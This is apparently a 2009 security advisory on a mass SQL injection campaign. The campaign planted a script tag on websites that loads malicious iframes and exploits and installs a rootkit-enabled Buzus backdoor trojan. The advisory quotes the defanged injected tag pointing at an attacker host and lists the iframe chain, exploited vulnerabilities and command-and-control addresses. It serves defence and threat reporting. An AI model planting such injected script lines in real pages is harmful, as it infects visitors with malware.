A large scale SQL injection attack has injected a malicious iframe on tens of thousands of susceptible websites. ScanSafe reports that the injected iframe loads malicious content from 318x.com, which eventually leads to the installation of a rootkit-enabled variant of the Buzus backdoor trojan. A Google search on the iframe resulted in over 132,000 hits as of December 10, 2009.
Injected iframe – <script src=hxxp://318x.com>
Executes a script that creates a new iframe to 318x.com/a.htm. That iframe (a.htm) does 2 things:
1. Loads a second iframe from aa1100.2288.org/htmlasp/dasp/alt.html
2. Loads a script: js.tongji.linezing.com/1358779/tongji.js (used for tracking).
The aa1100.2288.org/htmlasp/dasp/alt.html frame:
- Creates a third iframe pointing to aa1100.2288.org/htmlasp/dasp/share.html
- Loads a script: js.tongji.linezing.com/1364067/tongji.js (similar to above, but different number)
- If <noscript> it has an href tag that points to www.linezing.com with an img src of img.tongji.linezing.com/1364067/tongji.gif
Observed exploits include:
- Integer overflow vulnerability in Adobe Flash Player, described in CVE-2007-0071
- MDAC ADODB.Connection ActiveX vulnerability described in MS07-009
- Microsoft Office Web Components vulnerabilities described in MS09-043
- Microsoft video ActiveX vulnerability described in MS09-032
- Internet Explorer Uninitialized Memory Corruption Vulnerability – MS09-002.
Successful exploit leads to the silent delivery of (REDACTED). The file “down.css’ is actually a Win32 executable that is a variant of the Backdoor.Win32.Buzus family of trojans.
Aliases: Trojan-PWS.Win32.Lmir (Ikarus, a-squared); TR/Hijacker.Gen (AntiVir); Trojan/Win32.Buzus.gen (Antiy-AVL); W32/Agent.S.gen!Eldorado (F-Prot, Authentium); Win32:Rootkit-gen (Avast); Generic15.CBGO (AVG); Trojan.Generic.2823971 (BitDefender, GData); Trojan.Buzus.croo (Kaspersky, QuickHeal); Trojan.NtRootKit.2909 (DrWeb); Trj/Buzus.AH (Panda).
Drops the following files to the specified folder:
Modifies the Registry to load when Windows is started:
The malware contains a rootkit component which can prevent the dropped files and registry changes from being readily viewable.
Backdoor.Win32.Buzus.croo then attempts to contact 126.96.36.199 via port 80 and sends a POST request to hxxp://dns.winsdown.com.cn/Countdown/count.asp.